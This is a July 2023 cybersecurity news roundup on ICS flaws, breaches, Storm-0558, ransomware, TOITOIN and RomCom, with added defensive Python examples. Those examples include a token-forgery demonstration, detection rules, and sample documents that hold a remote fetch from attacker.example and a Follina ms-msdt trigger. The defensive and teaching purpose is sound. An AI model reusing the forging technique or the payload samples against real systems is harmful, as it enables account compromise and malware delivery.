
Thursday, July 13th, 2023

Cybersecurity Week in Review (14/07/2023)

APT Exploit Targeting Rockwell Automation Flaws Threatens Critical Infrastructure

An unnamed advanced persistent threat (APT) group has set its sights on two Rockwell Automation product vulnerabilities that it could use to cause disruption or destruction in critical infrastructure organisations.

According to its advisory (only accessible to registered users), Rockwell has worked with the US government to analyse what it describes as a new exploit capability leveraging vulnerabilities in ControlLogix EtherNet/IP communication modules.

Specifically, 1756-EN2 and 1756-EN3 series products are affected by CVE-2023-3595, a critical flaw that allows an attacker who can send specially crafted Common Industrial Protocol (CIP) messages to achieve remote code execution with persistence on the targeted module. A threat actor could exploit the vulnerability to modify, block or exfiltrate data passing through the device.

1756-EN4 series products are affected by CVE-2023-3596, a high-severity denial-of-service (DoS) bug that can likewise be triggered with specially crafted CIP messages.

Rockwell Automation has released firmware patches for each impacted product and has shared potential indicators of compromise (IoCs), as well as detection rules.
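Before the firmware patches can be applied, an operator needs an inventory of which ControlLogix communication modules are on the network and at what revision. The following is an added example, not Rockwell's or CISA's code and not their published detection rules: it builds the standard EtherNet/IP ListIdentity request, parses the reply, and flags modules whose product name falls in the 1756-EN2, 1756-EN3 or 1756-EN4 families named above. The reply layout follows the public EtherNet/IP encapsulation specification; the sample reply bytes, IP address, product code and serial number are constructed for the example, and the fixed firmware revisions are not reproduced here, so the reported revision still has to be compared against the vendor advisory.

```python
import socket
import struct

ENIP_PORT = 44818                   # EtherNet/IP explicit messaging, TCP and UDP
CMD_LIST_IDENTITY = 0x0063
CIP_IDENTITY_ITEM = 0x000C
# 24-byte encapsulation header: command, length, session handle, status,
# sender context (8 bytes), options; all little-endian.
HEADER = struct.Struct("<HHII8sI")

# Product-name prefixes for the module families named in the advisory summary.
# Fixed firmware revisions are deliberately not hard-coded; compare the parsed
# revision against the vendor advisory.
AFFECTED_PREFIXES = ("1756-EN2", "1756-EN3", "1756-EN4")


def build_list_identity_request():
    """A ListIdentity request is just the header with an empty payload."""
    return HEADER.pack(CMD_LIST_IDENTITY, 0, 0, 0, b"\x00" * 8, 0)


def parse_list_identity_response(data):
    """Parse one ListIdentity reply into a dict, or return None if malformed."""
    if len(data) < HEADER.size:
        return None
    cmd, length, _session, status, _ctx, _opts = HEADER.unpack_from(data, 0)
    if cmd != CMD_LIST_IDENTITY or status != 0 or len(data) < HEADER.size + length:
        return None
    body = data[HEADER.size:HEADER.size + length]
    if len(body) < 2:
        return None
    (item_count,) = struct.unpack_from("<H", body, 0)
    off = 2
    for _ in range(item_count):
        if len(body) < off + 4:
            return None
        item_type, item_len = struct.unpack_from("<HH", body, off)
        off += 4
        item = body[off:off + item_len]
        off += item_len
        if item_type != CIP_IDENTITY_ITEM or len(item) < 34:
            continue
        # Identity item: encap version (2, LE) | sockaddr_in (16, big-endian) |
        # vendor(2) device type(2) product code(2) rev major(1) rev minor(1)
        # status(2) serial(4) | product name (1-byte length + chars) | state(1)
        _family, port, addr = struct.unpack_from(">HHI", item, 2)
        vendor, dev_type, prod_code, rev_major, rev_minor, dev_status, serial = \
            struct.unpack_from("<HHHBBHI", item, 18)
        name_len = item[32]
        if len(item) < 33 + name_len + 1:
            return None
        name = item[33:33 + name_len].decode("ascii", "replace")
        return {
            "ip": socket.inet_ntoa(struct.pack(">I", addr)),
            "port": port,
            "vendor_id": vendor,            # 1 = Rockwell Automation / Allen-Bradley
            "device_type": dev_type,        # 12 = Communications Adapter
            "product_code": prod_code,
            "revision": f"{rev_major}.{rev_minor:03d}",
            "device_status": dev_status,
            "serial": f"{serial:08x}",
            "product_name": name,
            "state": item[33 + name_len],
        }
    return None


def is_affected_family(info):
    """True when the product name belongs to one of the families in the advisory."""
    return info is not None and info["product_name"].startswith(AFFECTED_PREFIXES)


def build_sample_response():
    """Constructed reply shaped like a 1756-EN2T's; address, product code,
    serial and state values are made up for this example."""
    name = b"1756-EN2T/D"
    item = (struct.pack("<H", 1)                                   # encapsulation version
            + struct.pack(">HH", 2, ENIP_PORT) + socket.inet_aton("192.168.10.20") + b"\x00" * 8
            + struct.pack("<HHHBBHI", 1, 12, 166, 11, 3, 0x0030, 0x00C0FFEE)
            + bytes([len(name)]) + name + b"\x03")
    body = struct.pack("<H", 1) + struct.pack("<HH", CIP_IDENTITY_ITEM, len(item)) + item
    return HEADER.pack(CMD_LIST_IDENTITY, len(body), 0, 0, b"\x00" * 8, 0) + body


def discover(timeout=2.0):
    """Broadcast ListIdentity on UDP/44818 and parse the replies. Run it only on
    networks you are authorised to scan; on production OT networks a passive
    capture of the same replies is the safer source."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    found = []
    try:
        sock.sendto(build_list_identity_request(), ("255.255.255.255", ENIP_PORT))
        while True:
            data, (src, _) = sock.recvfrom(4096)
            info = parse_list_identity_response(data)
            if info:
                info["source"] = src
                found.append(info)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


if __name__ == "__main__":
    for dev in discover():
        flag = "AFFECTED FAMILY" if is_affected_family(dev) else ""
        print(dev["source"], dev["product_name"], dev["revision"], flag)
```

The parser is what matters for offline use: feed it replies captured from a span port and the `is_affected_family` check gives a first cut of the patch list, with the revision column left for the human comparison against the advisory.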

“We are not aware of current exploitation leveraging this capability, and intended victimisation remains unclear,” Rockwell said. “Previous threat actor cyber activity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that victim scope could include international customers. Threat activity is subject to change and customers using affected products could face serious risk if exposed.”

The US Cybersecurity and Infrastructure Security Agency (CISA), which has helped Rockwell investigate the exploits, has also released an advisory to warn organisations about the vulnerabilities.

Depending on the targeted ControlLogix device’s configuration, the vulnerability could allow attackers to cause denial or loss of control, denial or loss of view, theft of operational data, or manipulation of control, with disruptive or destructive consequences for the industrial process the ControlLogix system is responsible for.

The exploit capability appears to be the work of an unnamed APT, but no evidence of exploitation in the wild has been found to date, and it’s unclear what organisations or sectors may be targeted.

However, the type of access provided by CVE-2023-3595 can be compared to the zero-day flaw leveraged by a Russia-linked state-sponsored group in attacks involving the Trisis/Triton malware.

News of the exploits emerged just weeks after it was reported that several US government departments had been investigating Rockwell’s operations at a facility in China, where employees might have access to information that could be used to compromise the systems of the company’s customers.

There has been some concern that employees could find vulnerabilities in Rockwell products and exploit them in zero-day attacks aimed at systems in the US.

Source – https://www.securityweek.com/apt-exploit-targeting-rockwell-automation-flaws-could-threaten-critical-infrastructure/

HCA Data Breach: Hacker Stole Information of 11M Patients

HCA, a Nashville-based healthcare network of 180 hospitals and more than 2300 ambulatory sites in both the UK and the US, confirmed sensitive patient information was leaked during a recent cyber attack – and is now up for sale on the dark web.

HCA Healthcare, which encounters an estimated 37 million patients annually across both nations, announced the leak on its website July 10th.

“HCA recently discovered that a list of certain information with respect to some of its patients was made available by an unknown and unauthorised party on an online forum,” the organisation stated.

HCA stressed that the stolen data did not include any clinical or financial information.

“This appears to be a theft from an external storage location exclusively used to automate the formatting of email messages,” the notice said.

The published patient data contains “information used for email messages, such as reminders that patients may wish to schedule an appointment and education on healthcare programs and services,” HCA stated.

“The investigation is ongoing and we cannot confirm the number of individuals whose information was impacted. HCA Healthcare believes that the list contains approximately 27 million rows of data that may include information for approximately 11 million HCA Healthcare patients.”

Patient information that was exposed includes:

  • Patient name, city, state, and zip code;
  • Patient email, telephone number, date of birth, gender;
  • Patient service date, location and next appointment date.


HCA said the leak did not include more sensitive information, such as:

  • Clinical information, such as treatment, diagnosis, or condition;
  • Payment information, such as credit card or account numbers;
  • Sensitive information, such as passwords, driver’s license or social security numbers.


Online hacker forums and criminal darknet markets, such as the resurrected BreachForums and the new Genesis replacement 2Easy, are teeming with users advertising to buy, sell and trade stolen data, as well as other hacking tools.

The security incident has not caused any “disruption to the care and services” provided to patients and communities, or to its day to day business operations, HCA said in the notice.

The company said IT teams have “not identified evidence of malicious activity” on the HCA Healthcare networks or systems, and IT teams “disabled user access to the storage location as an immediate containment measure.”

“Based on the information known at this time, the company does not believe the incident will materially impact its business, operations, or financial results,” HCA said.

Source – https://cybernews.com/news/hca-us-uk-healthcare-network-patient-data-leak/

Microsoft: Chinese Hackers Breached US Govt Exchange Email Accounts

A Chinese hacking group has breached the email accounts of more than two dozen organisations worldwide, including U.S. and Western European government agencies, according to Microsoft.

The attacks have been pinned on a threat group tracked as Storm-0558, believed to be a cyber-espionage outfit focused on collecting sensitive information by breaching email systems. Microsoft started investigating these attacks on June 16, 2023, following customer reports regarding unusual mail activity.

The company discovered that starting from May 15, 2023, Storm-0558 threat actors managed to access Outlook accounts belonging to roughly 25 organisations and some consumer accounts likely connected to these organisations. However, Microsoft did not share what organisations, government agencies, or countries were affected in these email breaches.

To do that, the attackers used authentication tokens forged with the help of a stolen Microsoft account (MSA) consumer signing key.

“The actor used an acquired MSA key to forge tokens to access OWA and Outlook.com. MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail,” Microsoft said in a blog post published late Tuesday evening.
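The “token validation issue” Microsoft describes is an instance of a general mistake: resolving a token’s signing key by key ID across every key set the service knows, instead of only the key set belonging to the issuer it trusts for that audience. The following added example is not Microsoft’s code; the issuer names, key IDs and key material are placeholders, and HMAC stands in for the RSA signatures real tokens carry so that the example runs with the standard library. It shows a flawed validator that accepts a token signed with a consumer key but carrying enterprise claims, next to a validator that binds the key lookup to the expected issuer and rejects the same token.

```python
import base64
import hashlib
import hmac
import json
import time

# Two separate signing-key stores, mirroring the consumer (MSA) and enterprise
# (Azure AD) split in Microsoft's description. Issuer names and secrets are
# placeholders; real keys are RSA and fetched from each issuer's metadata.
CONSUMER_ISSUER = "https://consumer.issuer.example"
ENTERPRISE_ISSUER = "https://enterprise.issuer.example/tenant"
KEYS_BY_ISSUER = {
    CONSUMER_ISSUER: {"msa-key-1": b"consumer-signing-secret"},
    ENTERPRISE_ISSUER: {"aad-key-1": b"enterprise-signing-secret"},
}


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(claims, kid, key):
    """Mint a JWT-shaped token header.payload.signature (HS256 stand-in)."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def _parse(token):
    h, p, s = token.split(".")
    return json.loads(_unb64url(h)), json.loads(_unb64url(p)), (h + "." + p).encode(), _unb64url(s)


def _signature_ok(key, signing_input, sig):
    return hmac.compare_digest(hmac.new(key, signing_input, hashlib.sha256).digest(), sig)


def validate_weak(token, expected_aud, now=None):
    """Flawed validator: resolves 'kid' across every key store it knows, so a
    token signed with a consumer key can carry enterprise claims and pass."""
    header, claims, signing_input, sig = _parse(token)
    merged = {kid: k for store in KEYS_BY_ISSUER.values() for kid, k in store.items()}
    key = merged.get(header.get("kid"))
    if key is None or not _signature_ok(key, signing_input, sig):
        return None
    if claims.get("aud") != expected_aud or claims.get("exp", 0) <= (now or time.time()):
        return None
    return claims


def validate_strict(token, expected_iss, expected_aud, now=None):
    """Hardened validator: the key store is chosen by the issuer this service
    trusts for the audience, and the token's own 'iss' must match it."""
    header, claims, signing_input, sig = _parse(token)
    if claims.get("iss") != expected_iss:
        return None
    key = KEYS_BY_ISSUER.get(expected_iss, {}).get(header.get("kid"))
    if key is None or not _signature_ok(key, signing_input, sig):
        return None
    if claims.get("aud") != expected_aud or claims.get("exp", 0) <= (now or time.time()):
        return None
    return claims


def demo(now=None):
    """Forge an enterprise-mail token with the consumer key.
    Returns (weak_validator_accepts, strict_validator_accepts)."""
    now = now or time.time()
    stolen_consumer_key = KEYS_BY_ISSUER[CONSUMER_ISSUER]["msa-key-1"]
    forged = sign_token(
        {"iss": ENTERPRISE_ISSUER, "aud": "enterprise-mail",
         "upn": "target@tenant.example", "exp": now + 600},
        "msa-key-1", stolen_consumer_key)
    return (validate_weak(forged, "enterprise-mail", now) is not None,
            validate_strict(forged, ENTERPRISE_ISSUER, "enterprise-mail", now) is not None)


if __name__ == "__main__":
    print("weak accepts forged token: %s, strict accepts forged token: %s" % demo())
```

The forged token is otherwise well formed: the signature verifies under the stolen key, the audience and expiry are right, and only the question “is this key allowed to sign for this issuer?” separates the two validators.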

Microsoft added that it found no evidence indicating any additional unauthorised access after it “completed mitigation of this attack.”

The incident was reported to Microsoft by U.S. government officials last month after the discovery of unauthorised access to Microsoft cloud-based email services.

On Tuesday, Microsoft also revealed that the Russia-based RomCom cybercriminal group exploited an unpatched Office zero-day in recent spear-phishing attacks targeting organisations attending the NATO Summit in Vilnius, Lithuania.

Source – https://www.bleepingcomputer.com/news/security/microsoft-chinese-hackers-breached-us-govt-exchange-email-accounts/

Beware of Big Head Ransomware: Spreading Through Fake Windows Updates

A developing piece of ransomware called Big Head is being distributed as part of a malvertising campaign that takes the form of bogus Microsoft Windows updates and Word installers.

Big Head was first documented last month, when multiple variants of the ransomware were discovered designed to encrypt files on victims’ machines in exchange for a cryptocurrency payment. A majority of the Big Head samples have been submitted so far from the U.S., Spain, France, and Turkey.

A new analysis of the .NET-based ransomware showed its ability to deploy three encrypted binaries: 1.exe to propagate the malware, archive.exe to facilitate communications over Telegram, and Xarch.exe to encrypt the files and display a fake Windows update.

The malware displays a fake Windows Update UI to deceive the victim into thinking that the malicious activity is a legitimate software update process, with the displayed progress percentage advancing in 100-second increments.

Big Head is no different from other ransomware families in that it deletes backups, terminates several processes, and performs checks to determine if it’s running within a virtualised environment before proceeding to encrypt the files.

In addition, the malware disables the Task Manager to prevent users from terminating or investigating its process, and aborts if the machine’s language is set to Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar or Uzbek. It also incorporates a self-delete function to erase its presence.

Also discovered is a third variant of Big Head that incorporates a file infector called Neshta, which is used to insert malicious code into executables on the infected host.

The identity of the threat actor behind Big Head is currently not known but a YouTube channel with the name “aplikasi premium cuma cuma,” was identified, suggesting an adversary likely of Indonesian origin.

Source – https://thehackernews.com/2023/07/beware-of-big-head-ransomware-spreading.html

Microsoft Warns of Office Zero-Day Attacks, No Patch Available

Russian spies and cybercriminals are actively exploiting still-unpatched security flaws in Microsoft Windows and Office products, according to an urgent warning from the world’s largest software maker.

In an unusual move, Microsoft documented “a series of remote code execution vulnerabilities” impacting Windows and Office users and confirmed it was investigating multiple reports of targeted code execution attacks using Microsoft Office documents.

Redmond’s security response pros tagged the unpatched Office flaws with the CVE-2023-36884 identifier and hinted that an out-of-band patch may be released before next month’s Patch Tuesday.

From the CVE-2023-36884 bulletin:

“Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.

An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.”

In a separate blog, Microsoft’s threat intelligence team said it flagged a phishing campaign with Office zero-day exploits targeting defense and government entities in Europe and North America. “The campaign involved the abuse of CVE-2023-36884, which included a remote code execution vulnerability exploited via Microsoft Word documents, using lures related to the Ukrainian World Congress,” the company warned.

The Microsoft Office zero-day headlines a monster Patch Tuesday that sees the release of patches for more than 130 documented security defects in the Microsoft Windows ecosystem with nine of the flaws rated ‘critical’, Microsoft’s highest severity rating.

Source – https://www.securityweek.com/microsoft-warns-of-office-zero-day-attacks-no-patch-available/

Phishing Fears as Fake Threads Websites Multiply

Threads already has more than 100 million downloads, since Meta launched the app as a rival to Twitter earlier this month. But crooks are also seeking to cash in by mimicking the new social media app, with over 700 phony domain names emerging in a single day.

Researchers found hundreds of bogus domains, all registered on a single day, July 9th, that redirected to suspected malicious sites.

Threads ‘themed’ websites such as “Threadsapk[.]download”, a suspected phishing site, or “Threadsappz[.]com”, which purports to offer an Android version of the app, should be avoided.

Users should exercise caution, as the Threadsappz download is not sourced from the official App Store or Google Play. Instead, it redirects to an external source, in this case a Google Drive, from which the APK (Android package) file can be downloaded. Downloads from untrusted sources like this pose significant security risks, including the potential for malware infection.

Other suspicious domain names to watch out for include whatisthreads[.]com, socialthreads[.]store, threadsapp[.]shop, threadsl[.]com, and threadsinstagram[.]app — which appears to be trying to leverage fellow Meta platform Instagram as well.

Early adopters of Threads should exercise due caution at all times and only download it from trusted sources.

Consumers should also avoid clicking on links shared through unverified sources such as messages from unknown email addresses or unfamiliar websites, as these may send them to malicious websites or cajole them into downloading malware.

Once caught in this way, the victim is exposed to identity theft and to future phishing or social engineering scams, ultimately aimed at parting them from their money.

Source – https://cybernews.com/news/threads-fake-domain-names-phishing/

New TOITOIN Banking Trojan Targeting Latin American Businesses

Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023.

The sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilising specially crafted modules throughout each stage. These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks.

The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections.

The email messages leverage an invoice-themed lure to trick unwitting recipients into opening them, thereby activating the infection. Within the ZIP archive is a downloader executable that’s engineered to set up persistence by means of an LNK file in the Windows Startup folder and communicate with a remote server to retrieve six next-stage payloads in the form of MP3 files.

The downloader is also responsible for generating a Batch script that restarts the system after a 10-second timeout. This is done so as to “evade sandbox detection since the malicious actions occur only after the reboot,” the researchers said.

Included among the fetched payloads is “icepdfeditor.exe,” a valid signed binary by ZOHO Corporation Private Limited, which, when executed, sideloads a rogue DLL (“ffmpeg.dll”) codenamed the Krita Loader.

The loader, for its part, is designed to decode a JPG file downloaded alongside the other payloads and launch another executable known as the InjectorDLL module that reverses a second JPG file to form what’s called the ElevateInjectorDLL module.

The InjectorDLL component subsequently moves to inject ElevateInjectorDLL into the “explorer.exe” process, following which a User Account Control (UAC) bypass is carried out, if required, to elevate the process privileges and the TOITOIN Trojan is decrypted and injected into the “svchost.exe” process.
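Several steps of this chain leave telemetry an endpoint hunt can catch: an LNK dropped into a Startup folder, a scripted reboot with a short timeout, and an unsigned DLL loaded from the same user-writable directory as the signed binary that sideloads it. The following added example is not from the researchers’ report; it runs those three checks over constructed Sysmon-style events. The field names follow Sysmon’s ProcessCreate, ImageLoad and FileCreate events, the file paths are made up, and the exact shutdown command line is an assumption, since the report only states that the batch script restarts the system after a 10-second timeout.

```python
import ntpath
import re

# Constructed Sysmon-style events, not real telemetry. "id" is the Sysmon
# event ID: 1 ProcessCreate, 7 ImageLoad, 11 FileCreate. Paths are made up and
# the shutdown command line is an assumption about how the batch script
# performs the 10-second reboot the report describes.
EVENTS = [
    {"id": 11, "Image": r"C:\Users\ana\AppData\Local\Temp\downloader.exe",
     "TargetFilename": r"C:\Users\ana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\ana\AppData\Local\Temp\downloader.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\ana\AppData\Local\Temp\restart.bat"'},
    {"id": 1, "Image": r"C:\Windows\System32\shutdown.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "shutdown /r /t 10"},
    {"id": 7, "Image": r"C:\Users\ana\AppData\Local\Temp\icepdfeditor.exe",
     "ImageLoaded": r"C:\Users\ana\AppData\Local\Temp\ffmpeg.dll",
     "Signed": "false", "Signature": "-"},
    {"id": 7, "Image": r"C:\Users\ana\AppData\Local\Temp\icepdfeditor.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]

# Per-user and all-users Startup folders both end in "Start Menu\Programs\Startup".
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
# Directories an unprivileged user can write to; a signed binary running from
# one of these and pulling a DLL from beside itself is the sideloading shape.
USER_WRITABLE_RE = re.compile(r"\\(users\\[^\\]+\\(appdata|downloads)|programdata|windows\\temp)\\", re.I)
TIMEOUT_RE = re.compile(r"/t\s+(\d+)", re.I)


def is_user_writable(path):
    return bool(USER_WRITABLE_RE.search(path))


def hunt(events):
    """Return (rule, detail) hits for the three behaviours described above."""
    hits = []
    for ev in events:
        if ev["id"] == 11 and STARTUP_LNK_RE.search(ev["TargetFilename"]):
            hits.append(("startup_lnk", f'{ev["Image"]} wrote {ev["TargetFilename"]}'))
        elif ev["id"] == 1 and ntpath.basename(ev["Image"]).lower() == "shutdown.exe":
            cmd = ev["CommandLine"]
            timeout = TIMEOUT_RE.search(cmd)
            scripted = ntpath.basename(ev["ParentImage"]).lower() == "cmd.exe"
            if scripted and "/r" in cmd.lower().split() and timeout and int(timeout.group(1)) <= 30:
                hits.append(("scripted_reboot", f'{ev["ParentImage"]} ran: {cmd}'))
        elif ev["id"] == 7:
            exe_dir = ntpath.dirname(ev["Image"]).lower()
            dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
            if exe_dir == dll_dir and ev["Signed"].lower() == "false" and is_user_writable(ev["Image"]):
                hits.append(("dll_sideload",
                             f'{ev["Image"]} loaded unsigned {ntpath.basename(ev["ImageLoaded"])} from its own directory'))
    return hits


if __name__ == "__main__":
    for rule, detail in hunt(EVENTS):
        print(f"[{rule}] {detail}")
```

The sideload rule deliberately keys on the process directory being user-writable rather than on the DLL name, so it also catches the same pattern with a different decoy library; the legitimate kernel32.dll load in the sample produces no hit because it comes from System32.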

TOITOIN comes with capabilities to gather system information as well as harvest data from installed web browsers such as Google Chrome, Microsoft Edge and Internet Explorer, Mozilla Firefox, and Opera. Furthermore, it checks for the presence of Topaz Online Fraud Detection (OFD), an anti-fraud module integrated into banking platforms in the LATAM region.

The nature of the responses from the command-and-control (C2) server is presently not known due to the fact that the server is no longer available.

Source – https://thehackernews.com/2023/07/new-toitoin-banking-trojan-targeting.html

Critical Infrastructure Services Firm Ventia Takes Systems Offline Due to Cyberattack

Critical infrastructure services provider Ventia over the weekend announced that it has taken some of its systems offline to contain a cyberattack. Ventia provides long-term management, maintenance, and operations services for critical infrastructure organisations and for private entities across the defense, electricity and gas, environmental services, and water industries.

The company says it operates more than 400 sites in Australia and New Zealand, with a combined employee base of over 35,000.

In an incident notice on Saturday, the company announced that it decided to take some key systems offline in response to the incident, and that it had engaged with external experts and law enforcement to investigate it.

“As we work to restore our networks, we will prioritise the security and safety of our people, our customers, and our stakeholders,” the company said.

Ventia did not share details on the impact the incident has had but said in an updated statement on Sunday that its operations are continuing while it monitors its network for any abnormal activity.

According to Ventia, all operations are expected to return to normal within the following days.

Although the company did not share specifics on the incident, it is possible that file-encrypting ransomware was involved in the attack, as typical incident response measures in the event of ransomware involve taking systems offline to prevent it from spreading.

The company has yet to reveal whether any type of information was stolen during the attack.

Source – https://www.securityweek.com/critical-infrastructure-services-firm-ventia-takes-systems-offline-due-to-cyberattack/

Revolut Faces $20 Million Loss as Attackers Exploit Payment System Weakness

Malicious actors exploited an unknown flaw in Revolut’s payment systems to steal more than $20 million of the company’s funds in early 2022.

The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly.

The fault stemmed from discrepancies between Revolut’s U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined.

The problem was first detected in late 2021. But before it could be closed, the report said organised criminal groups leveraged the loophole by “encouraging individuals to try to make expensive purchases that would go on to be declined.” The refunded amounts would then be withdrawn from ATMs.

The exact technical details associated with the flaw are currently unclear.

About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The mass fraud scheme is said to have resulted in a net loss of about $20 million for the neobank and fintech firm.

The disclosure arrives less than a week after Interpol announced the arrest of a suspected senior member of a French-speaking hacking crew known as OPERA1ER, which has been linked to attacks aimed at financial institutions and mobile banking services with malware, phishing campaigns, and large-scale Business Email Compromise (BEC) scams.

Source – https://thehackernews.com/2023/07/hackers-steal-20-million-by-exploiting.html

RomCom Hackers Target NATO Summit Attendees in Phishing Attacks

A threat actor referred to as ‘RomCom’ has been targeting organisations supporting Ukraine and guests of the NATO Summit that took place on July 11th in Vilnius, Lithuania.

Intelligence teams recently discovered two malicious documents that impersonated the Ukrainian World Congress organisation and topics related to the NATO Summit to lure selected targets. The attackers used a replica of the Ukrainian World Congress website hosted on an “.info” domain instead of the real one, which uses an “.org” top-level domain.

The downloaded documents come with malicious code that exploits the RTF file format to initiate connections to external resources, eventually loading malware onto the victim’s system.

RomCom malware was first discovered by Unit 42 in August 2022, who linked it to a Cuba Ransomware affiliate, an assessment that the Computer Emergency Response Team of Ukraine (CERT-UA) appeared to agree with based on an October 2022 report.

However, analysis from that time said that the threat actors behind RomCom follow a rather globalised targeting approach, highlighting that Cuba ransomware has never inclined towards hacktivism.

In November 2022, a new RomCom campaign was discovered that abused software brands and used fake sites in English and Ukrainian to target unsuspecting victims with malicious installers.

More recently, in May 2023, a report on RomCom’s latest campaign showed that the threat actors were now impersonating legitimate software like Gimp and ChatGPT or creating fake software developer sites to push their backdoor to victims through Google Ads and black SEO techniques.

The latest campaign used download links on a typo-squatted domain for the Ukrainian World Congress site, likely promoted via spear-phishing, to infect visitors with malware. The documents downloaded from the fake website initiate an outbound connection upon launch and download additional components from the attacker’s command and control (C2) server.

The additional component observed during the research is a script utilising the Follina (CVE-2022-30190) vulnerability from Microsoft’s Support Diagnostic Tool (MSDT).
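Both stages described above leave marks in the document itself before anything runs: an RTF field or OLE object that points at an external resource, an OOXML relationship whose TargetMode is External, and, for Follina, an ms-msdt: URI handed to the Support Diagnostic Tool. The following added example is not from the original research; it scans a document for those indicators. The RTF snippet and the in-memory .docx are constructed samples, and attacker.example is a placeholder, not a domain from the campaign.

```python
import io
import re
import zipfile

# Indicators for the two behaviours this roundup describes: a document that
# reaches out to an external resource on open, and the Follina (CVE-2022-30190)
# ms-msdt: URI handled by the Microsoft Support Diagnostic Tool.
URL_RE = re.compile(rb"(?:https?|file|mhtml)://[^\s\"'<>{}\\]+", re.I)
MSDT_RE = re.compile(rb"ms-msdt:[^\s\"'<>]*", re.I)
RTF_FIELD_RE = re.compile(rb"\\fldinst\s*(INCLUDEPICTURE|INCLUDETEXT|IMPORT|HYPERLINK|DDEAUTO|DDE)\b", re.I)
REL_RE = re.compile(rb"<Relationship\b[^>]*?/?>", re.I)


def _attr(elem, name):
    m = re.search(rb'%s="([^"]*)"' % name, elem, re.I)
    return m.group(1).decode("utf-8", "replace") if m else None


def scan_rtf(data):
    """Flag RTF constructs that fetch something remote when the file opens."""
    findings = []
    if rb"\objupdate" in data:
        findings.append("rtf:objupdate (OLE object refreshes on open)")
    for m in RTF_FIELD_RE.finditer(data):
        findings.append("rtf:field " + m.group(1).decode().upper())
    for m in URL_RE.finditer(data):
        findings.append("url " + m.group(0).decode("ascii", "replace"))
    for m in MSDT_RE.finditer(data):
        findings.append("msdt " + m.group(0).decode("ascii", "replace"))
    return findings


def scan_ooxml(data):
    """Flag external relationships and ms-msdt: URIs in any part of a .docx/.xlsx/.pptx."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            part = zf.read(name)
            if name.endswith(".rels"):
                for rel in REL_RE.findall(part):
                    if (_attr(rel, b"TargetMode") or "").lower() == "external":
                        findings.append(f"external-rel {name}: {_attr(rel, b'Target')}")
            for m in MSDT_RE.finditer(part):
                findings.append(f"msdt {name}: " + m.group(0).decode("ascii", "replace"))
    return findings


def scan_document(data):
    """Dispatch on the file signature; RTF starts with '{\\rt', OOXML is a zip."""
    if data.startswith(b"{\\rt"):
        return scan_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    return ["unrecognised format"]


# Constructed RTF sample: an INCLUDEPICTURE field pointing at a placeholder host.
RTF_SAMPLE = rb'{\rtf1\ansi{\field{\*\fldinst INCLUDEPICTURE "http://attacker.example/lure.png" \d}{\fldrslt }}}'


def build_sample_docx():
    """Constructed minimal .docx with a remote template relationship and an ms-msdt: link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", '<w:document><w:hyperlink r:id="rId2"/></w:document>')
        zf.writestr("word/_rels/document.xml.rels",
                    '<Relationships>'
                    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
                    'Target="http://attacker.example/template.dotm" TargetMode="External"/>'
                    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
                    'Target="ms-msdt:/id PCWDiagnostic /skip force" TargetMode="External"/>'
                    '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("rtf", RTF_SAMPLE), ("docx", build_sample_docx())):
        for finding in scan_document(blob):
            print(f"{label}: {finding}")
```

For OOXML only relationship targets are reported, not every URL, because the schema namespaces inside .rels files would otherwise drown the result in noise; the RTF path scans raw text because RTF has no equivalent manifest of external targets.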

The final step of the attack is to load the RomCom backdoor on the machine, which arrives in the form of an x64 DLL file named ‘Calc.exe.’ RomCom connects to the C2 to register the victim and sends back details such as username, network adapter info, and RAM size of the compromised computer.

